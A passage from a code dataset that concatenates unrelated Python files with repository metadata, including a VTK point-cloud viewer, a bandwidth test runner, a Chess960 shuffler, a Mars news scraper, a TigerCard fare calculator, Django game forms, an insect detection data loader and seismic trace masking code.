OnGetItemAttr(self, item):\n\t\treturn None\n","repo_name":"jbernardis/reprapnb","sub_path":"src/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":34035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"28093461473","text":"import vtk\nimport numpy as np\nimport laspy\nimport vtk.util.numpy_support as vtk_np\n# import open3d as o3d\n\n\npc = laspy.read('C:/Users/tanne/Desktop/VisualizationFinalProjectData/Mawchu_LLacta_UTM.las')\n# pc = laspy.read('2.las')\n\npc_array = np.vstack([pc.x, pc.y, pc.z]).transpose()\n# pc_array = pc_array[::100] # Randomly reducing the points \n # by a factor of 100\nprint(pc_array.shape)\nprint(pc_array[0])\n\ncolors = np.vstack([pc.red/2**16, pc.green/2**16, pc.blue/2**16]).transpose()\n\nnCoords = pc_array.shape[0]\nnElem = pc_array.shape[1]\n\nverts = vtk.vtkPoints()\ncells = vtk.vtkCellArray()\nscalars = None\n\npd = vtk.vtkPolyData()\n\nverts.SetData(vtk_np.numpy_to_vtk(pc_array))\n\ncells_npy = np.vstack([np.ones(nCoords,dtype=np.int64),\n np.arange(nCoords,dtype=np.int64)]).T.flatten()\nprint(cells_npy.shape)\n\ncells.SetCells(nCoords,vtk_np.numpy_to_vtkIdTypeArray(cells_npy))\n\npd.SetPoints(verts)\npd.SetVerts(cells)\npd.GetPointData().SetScalars(vtk_np.numpy_to_vtk(colors))\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInputDataObject(pd)\nmapper.SetColorModeToDirectScalars()\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\nactor.GetProperty().SetRepresentationToPoints()\n\nren = vtk.vtkRenderer()\nren.AddActor(actor)\n\nwindow = vtk.vtkRenderWindow()\nwindow.AddRenderer(ren)\n# window.SetSize(1000,1000)\n\ninteractor =vtk.vtkRenderWindowInteractor()\ninteractor.SetRenderWindow(window)\ninteractor.Initialize()\n\nwindow.Render()\ninteractor.Start()","repo_name":"nikhilmakkar/CS530FinalProject","sub_path":"scratch/FinalProject.py","file_name":"FinalProject.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"34575016343","text":"import json\nimport time\nimport logging\nimport threading\nimport os\nimport glob\n\nfrom bandwidth_src.bandwidth_test import bandwidth_test\nfrom utils.enums import image_roles\nfrom utils.file_utils import file_exists\n\n\nhost_name = \"host1\"\n\ntry:\n host_name = os.environ['HOSTNAME']\nexcept KeyError as e:\n pass\n\ntry:\n if host_name == \"host1\":\n host_name = os.environ['USER']\nexcept KeyError as e:\n 
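The point-cloud script above (FinalProject.py) builds one vertex cell per point by hand; the pattern is reusable. A self-contained sketch factoring it into a helper — make_point_polydata is my name, not the repo's:

import numpy as np
import vtk
import vtk.util.numpy_support as vtk_np

def make_point_polydata(points):
    """Wrap an (N, 3) float array as vtkPolyData with one vertex cell per point."""
    n = points.shape[0]
    verts = vtk.vtkPoints()
    verts.SetData(vtk_np.numpy_to_vtk(points))
    # Each cell is encoded as [1, point_id]: a vertex cell containing one point.
    cells_npy = np.vstack([np.ones(n, dtype=np.int64),
                           np.arange(n, dtype=np.int64)]).T.flatten()
    cells = vtk.vtkCellArray()
    cells.SetCells(n, vtk_np.numpy_to_vtkIdTypeArray(cells_npy))
    pd = vtk.vtkPolyData()
    pd.SetPoints(verts)
    pd.SetVerts(cells)
    return pd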
pass\n\n\n\nBANDWIDTH_TEST_IDENTIFIER = \".b_test.json\"\n\n\nlogger = logging.getLogger(__name__)\n\nfh = logging.FileHandler('test_output.log')\nfh.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\n\nlogger.addHandler(fh)\n\n\nALREADY_TESTED_FILES = set()\n\ndef get_bandwidth_test_config():\n try:\n test_files = glob.glob(\"*.b_test.json\")\n file_name = test_files[0]\n ALREADY_TESTED_FILES.add('file_name')\n test_file = open(file_name, \"r\")\n bandwidth_tests = json.load(test_file)\n test_file.close()\n except FileNotFoundError as e:\n print(e)\n exit()\n return bandwidth_tests\n\n\ndef poll_for_bandwidth_test_config():\n while True:\n test_files = glob.glob(\"*.b_test.json\")\n if len(test_files) > 0:\n break\n\ndef execute_tests(bandwidth_tests):\n global host_name\n config = bandwidth_tests['config']\n threads = list()\n try:\n for test in bandwidth_tests['tests']:\n b_test = bandwidth_test(\n test['server'],\n test['client'],\n test['output_file_name'],\n test['port'],\n test['time'])\n\n if b_test.server == host_name:\n if 'concurrent' in config and config['concurrent']:\n # run as thread\n logger.warning(f\"starting server thread for {b_test.server}. client is {b_test.client}\")\n x = threading.Thread(target=b_test.run_server, args=())\n x.start()\n threads.append(x)\n else:\n logger.warning(f\"running server test for {b_test.server}. client is {b_test.client}\")\n b_test.run_server()\n logger.warning(f\"done with server test for {b_test.server}. output file is {b_test.output_file_name}\")\n elif b_test.client == host_name:\n if 'concurrent' in config and config['concurrent']:\n # run as thread\n logger.warning(f\"started client thread for {b_test.client}. server is {b_test.server}\")\n y = threading.Thread(target=b_test.run_client, args=())\n y.start()\n threads.append(y)\n else:\n logger.warning(f\"running client for {b_test.client}. server is {b_test.server}\")\n b_test.run_client()\n logger.warning(f\"done with client test for {b_test.client}. server was {b_test.server}\")\n elif 'stagger' in config and config['stagger']:\n logger.warning(f\"sleeping for test\")\n time.sleep(b_test.time)\n \n except Exception as e:\n logger.warning(f\"Error running tests. let's log e. 
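Two slips in the config handling above: ALREADY_TESTED_FILES.add('file_name') stores the literal string instead of the variable, and an empty glob returns [] (so test_files[0] raises IndexError, never FileNotFoundError, and the except clause cannot fire); the polling loop also busy-waits. A hedged corrected sketch:

import glob
import json
import time

ALREADY_TESTED_FILES = set()

def get_bandwidth_test_config():
    test_files = glob.glob("*.b_test.json")
    if not test_files:
        raise SystemExit("no *.b_test.json config found")
    file_name = test_files[0]
    ALREADY_TESTED_FILES.add(file_name)  # the variable, not the literal string
    with open(file_name) as test_file:
        return json.load(test_file)

def poll_for_bandwidth_test_config(interval=1.0):
    # Sleeping between globs avoids spinning a CPU core while waiting.
    while not glob.glob("*.b_test.json"):
        time.sleep(interval)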
{e}\")\n\n logger.warning(\"Done with all bandwidth tests\")\n for th in threads:\n th.join()\n logger.warning(\"all bandwidth tests are joined\")\n\n\n\ndef run_bandwidth_test():\n poll_for_bandwidth_test_config()\n bandwidth_test_config = get_bandwidth_test_config()\n execute_tests(bandwidth_test_config)\n # give me time to get bandwidth tests out of files\n time.sleep(1000)\n\n","repo_name":"Tmonster/fogify-evaluation","sub_path":"images/ping_image/bandwidth_src/run_bandwidth.py","file_name":"run_bandwidth.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33356887635","text":"class RandomChess:\n \"\"\"\n RandomChess is a class for creating random first rank according to a certain random mode which\n specifies the rules with which the randomly shuffled peices should be situated\n \"\"\"\n \n import random\n \n def __init__(self):\n # firstRank=['rookKingSide','knightKingSide','bishopKingSide','king','queen','bishopQueenSide','knightQueenSide','rookQueenSide']\n # firstRank=[u'\\u2656'.encode('utf-8'),u'\\u2658'.encode('utf-8'),u'\\u2657'.encode('utf-8'),u'\\u2654'.encode('utf-8'),\n# u'\\u2655'.encode('utf-8'),u'\\u2657'.encode('utf-8'),u'\\u2658'.encode('utf-8'),u'\\u2656'.encode('utf-8')]\n self._firstRank=['♖','♘','♗','♔','♕','♗','♘','♖']\n self._ShuffledFirstRank={'firstRank':['♖','♘','♗','♔','♕','♗','♘','♖'],\n 'state':{'KingPos':3,'RookPos':[0,7],'BishopPos':[2,5]}}\n @property \n def ShuffledFirstRank(self): \n print('getting ShuffledFirstRank...')\n return self._ShuffledFirstRank\n \n def ShuffleFirstRank(self,RandomMode=None):\n l=self._ShuffledFirstRank['firstRank']\n n=len(l)\n RookfirstPos=-1\n RooksecPos=-1\n kingPos=-1\n bishopFirstPos=-1\n bishopSecPos=-1\n\n for i in range(n):\n\n indRandom=random.randint(i,n-1)\n l[indRandom],l[i]=l[i],l[indRandom]\n\n p=l[i]\n \n if p==self._firstRank[0] and RookfirstPos>=0:\n RooksecPos=i\n elif p==self._firstRank[0]:\n RookfirstPos=i\n elif p==self._firstRank[2] and bishopFirstPos>=0:\n bishopSecPos=i\n elif p==self._firstRank[2]:\n bishopFirstPos=i\n elif p==self._firstRank[3]:\n kingPos=i\n \n self._ShuffledFirstRank['state']['KingPos']=kingPos\n self._ShuffledFirstRank['state']['RookPos']=[RookfirstPos,RooksecPos]\n self._ShuffledFirstRank['state']['BishopPos']=[bishopFirstPos,bishopSecPos]\n \n if RandomMode is not None:\n if RandomMode=='Fischer':\n if not ((bishopFirstPos+bishopSecPos)% 2==1 and kingPos>RookfirstPos and kingPos<RooksecPos):\n \n self._ShuffledFirstRank={'firstRank':['♖','♘','♗','♔','♕','♗','♘','♖'],\n 'state':{'KingPos':3,'RookPos':[0,7],'BishopPos':[2,5]}}\n else: \n return False\n return True\n \n def printFirstRank(self):\n print(repr(self._ShuffledFirstRank['firstRank']).decode('string-escape'))","repo_name":"hmazidi/random_chess","sub_path":"RandomChess.py","file_name":"RandomChess.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31649571538","text":"# Draw a snowman and snowflake using recursion\n\n\nimport turtle\n\n\ndef snowman(size, x, y):\n if size < 60: # Base case\n return\n turtle.penup()\n turtle.goto(x, y)\n turtle.pendown()\n turtle.circle(size)\n\n # Recursive calls\n snowman(size*0.8, x, y+size*1.2)\n snowman(size*0.6, x, y+size*2.2)\n\n\ndef snowflake(size):\n if size < 5: # Base case\n return\n for i in range(6):\n turtle.forward(size)\n snowflake(size/3) # Recursive call\n 
turtle.backward(size)\n turtle.right(60) # Rotate 60 degrees\n\n\n# Background and pen settings\nturtle.speed(0)\nturtle.ht()\nturtle.bgcolor(\"light blue\")\nturtle.color(\"white\")\nturtle.pensize(2)\n\n# Draw snowman\nsnowman(100, 0, -100)\n\n# Draw snowflake\nturtle.penup()\nturtle.goto(-300, 300)\nturtle.pendown()\nfor i in range(6):\n snowflake(100)\n turtle.right(60)\n\nturtle.done()\n","repo_name":"ahkim3/IT-4401","sub_path":"Module 10/Recursion/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"44251788386","text":"from Schema import *\nfrom GraphGenerator import *\n# check if each edge type have exactly one source type\n# and one target type in nodetypeset\ndef validateEdgetypeOfSchema(sc,mode='is'):\n for et in sc.edgetypeset.edgetypes:\n src = tar = 0\n if sc.nodetypeset.nodetypes.count(et.src_type) == 1 and \\\n sc.nodetypeset.nodetypes.count(et.target_type) == 1:\n continue\n for nt in sc.nodetypeset.nodetypes:\n if mode=='is':\n if nt is et.src_type:\n src += 1\n if nt is et.target_type:\n tar += 1\n elif mode.lower()=='l' or mode=='label' :\n if nt.equalLabels( et.src_type ):\n src += 1\n if nt.equalLabels( et.target_type ):\n tar += 1\n if src != 1 or tar != 1:\n return False\n return True\n\n\ndef findWithIs(li, e):\n if li.count(e) == 1:\n return li.index(e)\n for i, v in enumerate(li):\n if v is e:\n return i\n print(e, 'not found')\n\n\ndef getGraphFromSchema(sc):\n if validateEdgetypeOfSchema(sc) == False:\n print('the schema has problem with edge types, not matching node types')\n return\n g = nx.MultiGraph()\n g.add_nodes_from([(index, nt.attributes) for index, nt in enumerate(sc.nodetypeset.nodetypes)])\n edge_type_list = []\n for et in sc.edgetypeset.edgetypes:\n src = findWithIs(sc.nodetypeset.nodetypes, et.src_type)\n tar = findWithIs(sc.nodetypeset.nodetypes, et.target_type)\n edge_type_list.append((src, tar, et.attributes))\n g.add_edges_from(edge_type_list)\n return g\n\n\ndef node_subst_cost(n1, n2):\n cost = 0\n if set(n1).issuperset(set(n2)):\n cost = 0\n else:\n cost = len(set(n2) - set(n1)) / len(set(n2))\n return cost\n\n\ndef edge_subst_cost(e1, e2):\n if set(e1) == set(e2):\n return 0\n return 1\n\ndef computeGEDscore(gt_sc, sc):\n sc_G = getGraphFromSchema(gt_sc)\n scgen_G = getGraphFromSchema(sc)\n result = nx.algorithms.similarity.optimize_graph_edit_distance(scgen_G, sc_G, \\\n node_subst_cost=node_subst_cost,edge_subst_cost=edge_subst_cost)\n print('proximating GED')\n for i in result:\n print('score: ',i)\n print('done')","repo_name":"zhengfeitian/SchemaExtraction","sub_path":"Evaluation.py","file_name":"Evaluation.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28224994404","text":"import datetime as dt\nfrom bs4 import BeautifulSoup as soup \nfrom splinter import Browser\nimport pandas as pd\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n\ndef scrape_all():\n # executable_path = {\"executable_path\": \"/Users/ON054440/code/chromedriver\"}\n executable_path = {'executable_path': ChromeDriverManager().install()}\n browser = Browser(\"chrome\", **executable_path, headless=False)\n\n\n # Visit the mars nasa news site\n url = 'https://redplanetscience.com/'\n browser.visit(url)\n\n # Optional delay for loading the page\n browser.is_element_present_by_css('div.list_text', wait_time=1)\n\n # 
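findWithIs in Evaluation.py above prints 'not found' and implicitly returns None, which then flows into the edge list and fails later in a confusing place. A hedged variant that fails fast instead (find_with_is is my name):

def find_with_is(items, element):
    # Identity scan, mirroring the original's fallback branch.
    for i, value in enumerate(items):
        if value is element:
            return i
    raise ValueError(f"{element!r} not found by identity")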
Convert the browser html to a soup object and then quit the browser\n html = browser.html\n news_soup = soup(html, 'html.parser')\n\n slide_elem = news_soup.select_one('div.list_text')\n\n\n # Use the parent element to find the first a tag and save it as `news_title`\n news_title = slide_elem.find('div', class_='content_title').get_text()\n\n # Use the parent element to find the paragraph text\n news_paragraph = slide_elem.find('div', class_='article_teaser_body').get_text()\n\n # JPL Space Images\n\n # Visit URL\n url = 'https://spaceimages-mars.com'\n browser.visit(url)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_tag('button')[1]\n full_image_elem.click()\n\n # Parse the resulting html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n\n # find the relative image url\n img_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\n\n # Use the base url to create an absolute url\n featured_image = f'https://spaceimages-mars.com/{img_url_rel}'\n\n\n # Mars Facts\n\n df = pd.read_html('https://galaxyfacts-mars.com')[0]\n df.columns=['Description', 'Mars', 'Earth']\n df.set_index('Description', inplace=True)\n mars_facts = df.to_html()\n\n # 1. Use browser to visit the URL \n url = 'https://marshemispheres.com/'\n\n browser.visit(url)\n hemispheressoup = soup(browser.html, 'html.parser')\n hemitems = hemispheressoup.find_all(\"div\", class_=\"item\")\n\n # 2. Create a list to hold the images and titles.\n hemisphere_image_urls = []\n\n # 3. Write code to retrieve the image urls and titles for each hemisphere.\n for hemitem in hemitems:\n hemidict = {}\n # hemitem = hemitems[0]\n hemidict[\"title\"] = hemitem.find(\"h3\").text \n hemilink = hemitem.find(\"a\") [\"href\"]\n hemilink = url + hemilink\n hemisphere_image_urls.append(hemidict)\n\n # for hemitem in hemisphere_image_urls:\n browser.visit(hemilink)\n hemispheressoup = soup(browser.html, 'html.parser')\n hemitems = hemispheressoup.find(\"img\", class_=\"wide-image\")\n hemidict[\"img_url\"]= url + hemitems[\"src\"]\n\n\n scraped_data = {\n \"news_title\": news_title,\n \"news_paragraph\": news_paragraph,\n \"featured_image\": featured_image,\n \"facts\": mars_facts,\n \"hemispheres\": hemisphere_image_urls,\n \"last_modified\": dt.datetime.now()\n }\n\n return scraped_data\n","repo_name":"OnyNwosu/Web-Scraping-Challenge","sub_path":"scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"40774664721","text":"from day_journey import WeekdayJourney, WeekendJourney\r\nfrom constants import Fare, Capping, WEEKEND_DAYS\r\nfrom utils import get_date_time, get_week_number, get_day, get_time\r\n\r\n\r\nclass TigerCard:\r\n\r\n\tdef __init__(self):\r\n\t\tself._datetime = None\r\n\t\tself._week = None\r\n\t\tself._day = None\r\n\t\tself.current_fare = 0\r\n\t\tself.daily_fare = 0\r\n\t\tself.weekly_fare = 0\r\n\t\tself.total_fare = 0\r\n\r\n\tdef start_journey(self, datetime, from_zone, to_zone):\r\n\t\tself._set_initial_data(datetime, from_zone, to_zone)\r\n\t\tself.current_fare = self._get_calculated_fare()\r\n\t\tprint(f\"The fair calculated on {self._day} {self._time} from zone {from_zone} to zone {to_zone} is {self.current_fare} with daily fair {self.daily_fare}/{self.daily_capping} and weekly fair {self.weekly_fare}/{self.weekly_capping}\")\r\n\r\n\tdef _set_initial_data(self, datetime, from_zone, to_zone):\r\n\t\tself._datetime = 
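In scrape_all above, the block that visits the hemisphere page sits outside the for loop (note the commented-out second loop), so only the last entry ever receives an img_url. A hedged fix that fetches each detail page inside the loop; it assumes the surrounding names browser, soup, url, and hemitems from scrape_all:

hemisphere_image_urls = []
for hemitem in hemitems:
    hemidict = {"title": hemitem.find("h3").text}
    browser.visit(url + hemitem.find("a")["href"])  # visit this item's page
    detail = soup(browser.html, "html.parser")
    hemidict["img_url"] = url + detail.find("img", class_="wide-image")["src"]
    hemisphere_image_urls.append(hemidict)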
get_date_time(datetime)\r\n\t\tself._set_unset_daily_fare()\r\n\t\tself._set_unset_weekly_fare()\r\n\t\tself._from_zone = from_zone\r\n\t\tself._to_zone = to_zone\r\n\t\tself._day = get_day(self._datetime)\r\n\t\tself._time = get_time(self._datetime)\r\n\t\tself._week = get_week_number(self._datetime)\r\n\r\n\tdef _set_unset_daily_fare(self):\r\n\t\tif self._week == get_week_number(self._datetime) and self._day != get_day(self._datetime):\r\n\t\t\tself.daily_fare = 0\r\n\r\n\tdef _set_unset_weekly_fare(self):\r\n\t\tif self._week != get_week_number(self._datetime):\r\n\t\t\tself.weekly_fare = 0\t\r\n\r\n\tdef _get_fare(self):\r\n\t\tif self._day in WEEKEND_DAYS:\r\n\t\t\twj = WeekendJourney(self._time, self._from_zone, self._to_zone)\r\n\t\telse:\t\t\t\t\r\n\t\t\twj = WeekdayJourney(self._time, self._from_zone, self._to_zone)\r\n\r\n\t\tfare = Fare.OFF_PEAK_HOURS if wj.is_off_peak_hours else Fare.PEAK_HOURS\r\n\t\treturn fare[self._from_zone - 1][self._to_zone - 1]\r\n\t\r\n\tdef _get_calculated_fare(self):\r\n\t\tfare = self._get_minimum_fare()\r\n\r\n\t\tself.weekly_fare += fare\r\n\t\tself.daily_fare += fare\r\n\t\tself.total_fare += fare\r\n\r\n\t\treturn fare\r\n\r\n\tdef _get_minimum_fare(self):\r\n\t\tmax_fare_for_weekly_capping = self.weekly_capping - self.weekly_fare\r\n\t\tmax_fare_for_daily_capping = self.daily_capping - self.daily_fare\r\n\r\n\t\tif max_fare_for_weekly_capping < max_fare_for_daily_capping:\r\n\t\t\tfare = self._calculate_fare(self.weekly_capping, self.weekly_fare)\r\n\t\telse:\r\n\t\t\tfare = self._calculate_fare(self.daily_capping, self.daily_fare)\r\n\r\n\t\treturn fare\r\n\t\t\r\n\t@property\r\n\tdef daily_capping(self):\r\n\t\treturn Capping.DAILY_CAPPING[self._from_zone - 1][self._to_zone - 1]\r\n\r\n\t@property\r\n\tdef weekly_capping(self):\r\n\t\treturn Capping.WEEKLY_CAPPING[self._from_zone - 1][self._to_zone - 1]\r\n\r\n\tdef _calculate_fare(self, capping, total_fare):\r\n\t\tif capping <= total_fare:\r\n\t\t\treturn 0\r\n\t\tfare = self._get_fare()\r\n\t\tif capping < total_fare + fare:\r\n\t\t\tfare = capping - total_fare\r\n\t\treturn fare\r\n\t\r\n\r\nif __name__ == \"__main__\": \r\n\r\n\ttc = TigerCard()\r\n\ttc.start_journey(datetime=\"08/02/2021 10:20\", from_zone=2, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 10:45\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 16:15\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 18:15\", from_zone=1, to_zone=1)\r\n\ttc.start_journey(datetime=\"08/02/2021 19:00\", from_zone=1, to_zone=2)\r\n","repo_name":"rupeshtare/sample","sub_path":"TigerCard/tiger_card.py","file_name":"tiger_card.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32122866143","text":"\"\"\"boomerang.py\n\nUsage:\n boomerang.py <archivo> --inicio=<inicio> --fin=<fin> [--resize=<resize>]\n\nOptions:\n -h --help Show this screen.\n\"\"\"\n\nfrom moviepy.editor import VideoFileClip, concatenate_videoclips, vfx\n\ndef boomerang(archivo, inicio, fin, resize=None):\n v= VideoFileClip(archivo) #carga el arcivo de video como un objeto de moviepy \n v2= v.subclip(inicio, fin) #recorta la porcion que intereza \n v3= v2.fx(vfx.time_mirror) #hace una version \"reversa\" de v2\n v4= concatenate_videoclips([v2,v3]) #concatena v1 y v2\n\n if resize:\n v4 = v4.resize(resize)\n \n gif = archivo[0:-4] + '.gif' #crea el nombre de archivo de salida\n print('guardando ' + gif)\n v4.write_gif(gif) 
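One edge case in TigerCard._set_unset_daily_fare above: the daily total is only cleared when the stored week matches the new journey's week, so the first journey of a new week inherits the previous day's total. A hedged drop-in sketch (assuming the repo's get_day/get_week_number helpers):

def _set_unset_daily_fare(self):
    new_key = (get_week_number(self._datetime), get_day(self._datetime))
    if new_key != (self._week, self._day):
        self.daily_fare = 0  # reset whenever the calendar day changes at all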
#guarda el archivo resultante como gif\n\n\nif __name__ == '__main__':\n from docopt import docopt\n argumentos = docopt(__doc__)\n archivo = argumentos['<archivo>']\n inicio = float(argumentos['--inicio'])\n fin = float(argumentos['--fin'])\n resize = float(argumentos['--resize'])\n print (boomerang(archivo, inicio, fin, resize))\n","repo_name":"Jonatanavila/test","sub_path":"boomerang.py","file_name":"boomerang.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11421890440","text":"from django import forms\nfrom .models import Monster, LeaderboardEntry\n\nclass MonsterGuessForm(forms.Form):\n guess = forms.CharField(label=\"Your guess\", max_length=255)\n\nclass LeaderboardEntryForm(forms.ModelForm):\n class Meta:\n model = LeaderboardEntry\n fields = ['player_name']\n \nclass PlayerNameForm(forms.Form):\n player_name = forms.CharField(label='Your Name', max_length=100)\n \n \nclass GameChoiceForm(forms.Form):\n GAME_CHOICES = [\n ('ragnarok_monsters', 'Ragnarok Online Monsters', 'https://playragnarokonlinebr.com/img/logo.png'),\n ('pokemon', 'Pokemon', 'https://logospng.org/download/pokemon/pokemon-4096.png'),\n ]\n\n game = forms.ChoiceField(choices=[(game[0], game[1]) for game in GAME_CHOICES], widget=forms.RadioSelect, initial='ragnarok_monsters')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.games = [\n ('ragnarok_monsters', 'Ragnarok Online', 'https://c-cl.cdn.smule.com/rs-s27/arr/10/5a/4740a56f-e57d-4922-8217-07e0c575377c.jpg'),\n ('pokemon', 'Pokemon', 'https://logospng.org/download/pokemon/pokemon-256.png'),\n ]\n self.fields['game'].choices = [(game[0], game[1]) for game in self.GAME_CHOICES]\n print(self.fields['game'].choices)\n for game in self.fields['game'].choices:\n print(game)\n\n self.choice_images = {}\n for game in self.fields['game'].choices:\n self.choice_images[game[0]] = self.get_image_url(game[0])\n @staticmethod\n def get_image_url(game_id):\n for game in GameChoiceForm.GAME_CHOICES:\n if game[0] == game_id:\n return game[2]\n return None","repo_name":"jfsjunqueira/ragnarok-disguise","sub_path":"game/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"30996756824","text":"# 数据读取\nimport cv2\nfrom ImagePathLabels import get_annotations, get_insect_names\nimport numpy as np\nfrom PIL import Image, ImageEnhance\nimport random\n\nTRAINDIR = '/home/marco/Datasets/Paddle/insects/train'\nTESTDIR = '/home/marco/Datasets/Paddle/insects/test'\nVALIDDIR = '/home/marco/Datasets/Paddle/insects/val'\n\ndef get_bbox(gt_bbox, gt_class):\n # 对于一般的检测任务来说,一张图片上往往会有多个目标物体\n # 设置参数MAX_NUM = 50, 即一张图片最多取50个真实框;如果真实\n # 框的数目少于50个,则将不足部分的gt_bbox, gt_class和gt_score的各项数值全设置为0\n MAX_NUM = 50\n gt_bbox2 = np.zeros((MAX_NUM, 4))\n gt_class2 = np.zeros((MAX_NUM,))\n for i in range(len(gt_bbox)):\n gt_bbox2[i, :] = gt_bbox[i, :]\n gt_class2[i] = gt_class[i]\n if i >= MAX_NUM:\n break\n return gt_bbox2, gt_class2\n\ndef get_img_data_from_file(record):\n \"\"\"\n record is a dict as following,\n record = {\n 'im_file': img_file,\n 'im_id': im_id,\n 'h': im_h,\n 'w': im_w,\n 'is_crowd': is_crowd,\n 'gt_class': gt_class,\n 'gt_bbox': gt_bbox,\n 'gt_poly': [],\n 'difficult': difficult\n }\n \"\"\"\n im_file = record['im_file']\n h = record['h']\n w = record['w']\n is_crowd = record['is_crowd']\n gt_class = 
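boomerang.py above declares --resize as optional, but float(argumentos['--resize']) raises TypeError whenever the flag is omitted, because docopt returns None for it. A hedged replacement for that part of the __main__ block:

resize_arg = argumentos['--resize']
resize = float(resize_arg) if resize_arg is not None else None
print(boomerang(archivo, inicio, fin, resize))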
record['gt_class']\n gt_bbox = record['gt_bbox']\n difficult = record['difficult']\n\n img = cv2.imread(im_file)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # check if h and w in record equals that read from img\n assert img.shape[0] == int(h), \\\n \"image height of {} inconsistent in record({}) and img file({})\".format(\n im_file, h, img.shape[0])\n\n assert img.shape[1] == int(w), \\\n \"image width of {} inconsistent in record({}) and img file({})\".format(\n im_file, w, img.shape[1])\n\n gt_boxes, gt_labels = get_bbox(gt_bbox, gt_class)\n\n # gt_bbox 用相对值\n gt_boxes[:, 0] = gt_boxes[:, 0] / float(w)\n gt_boxes[:, 1] = gt_boxes[:, 1] / float(h)\n gt_boxes[:, 2] = gt_boxes[:, 2] / float(w)\n gt_boxes[:, 3] = gt_boxes[:, 3] / float(h)\n \n return img, gt_boxes, gt_labels, (h, w)\n\n\ncname2cid = get_insect_names()\nprint(\"cname2cid:\", cname2cid)\nrecords = get_annotations(cname2cid, TRAINDIR)\nprint(\"len(records):\", len(records))\nprint(\"records[0]:\", records[0])\n\n\nrecord = records[0]\nimg, gt_boxes, gt_labels, scales = get_img_data_from_file(record)\nprint(\"img.shape:\", img.shape)\nprint(\"gt_boxes.shape:\", gt_boxes.shape)\nprint(\"gt_labels:\", gt_labels)\nprint(\"scales:\", scales)\n\n# get_img_data_from_file()函数可以返回图片数据的数据,它们是图像数据img,\n# 真实框坐标gt_boxes,真实框包含的物体类别gt_labels,图像尺寸scales。\n\n","repo_name":"LiuXiang199x/Estudiar","sub_path":"Paddle/project/yolo_DetectPests/src/ReadPreprocessImg.py","file_name":"ReadPreprocessImg.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"72984637111","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\n\nnp.random.seed(2022)\n\n\ndef continue_show_slice(curr_slice, size, show_slice):\n if show_slice is None: return False\n if show_slice < 0: show_slice = show_slice + size\n if curr_slice == show_slice:\n return True\n else:\n return False\n\n\ndef discrete_missing(data, proportions=(0.75, 0.75, 0.75), directions=('iline', 'xline', 'tline'),\n mask=None, show_slices=(None, None, None), random_seed=2022):\n assert len(proportions) == len(directions) == len(show_slices)\n assert set(directions).issubset({'iline', 'xline', 'tline'})\n random.seed(random_seed)\n d_dict = dict(zip(directions, proportions))\n d_show_slice = dict(zip(directions, show_slices))\n if mask is None: mask = np.ones_like(data)\n size = data.shape\n for direction in directions:\n proportion = d_dict[direction]\n show_slice = d_show_slice[direction]\n print(f'{direction} random discrete missing proportion: {proportion * 100}%')\n if direction == 'iline':\n sample = random.sample(range(1, size[2]), int((size[2] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[2], show_slice): continue\n mask[:, :, i] = 0\n elif direction == 'xline':\n sample = random.sample(range(1, size[1]), int((size[1] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[1], show_slice): continue\n mask[:, i, :] = 0\n else:\n sample = random.sample(range(1, size[0]), int((size[0] - 1) * proportion))\n for i in sample:\n if continue_show_slice(i, size[0], show_slice): continue\n mask[i, :, :] = 0\n return mask\n\n\ndef continuous_missing(data, num_traces=(50, 50, 50), directions=('iline', 'xline', 'tline'),\n start_missing=(20, 20, 20), mask=None):\n assert len(num_traces) == len(directions)\n assert len(num_traces) == len(start_missing)\n assert set(directions).issubset({'iline', 'xline', 'tline'})\n if 
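get_bbox above writes gt_bbox2[i, :] before testing i >= MAX_NUM, so an image with more than 50 boxes raises IndexError at i == 50 before the break can run. A hedged fix that bounds the loop up front:

import numpy as np

def get_bbox(gt_bbox, gt_class, max_num=50):
    gt_bbox2 = np.zeros((max_num, 4))
    gt_class2 = np.zeros((max_num,))
    for i in range(min(len(gt_bbox), max_num)):
        gt_bbox2[i, :] = gt_bbox[i, :]
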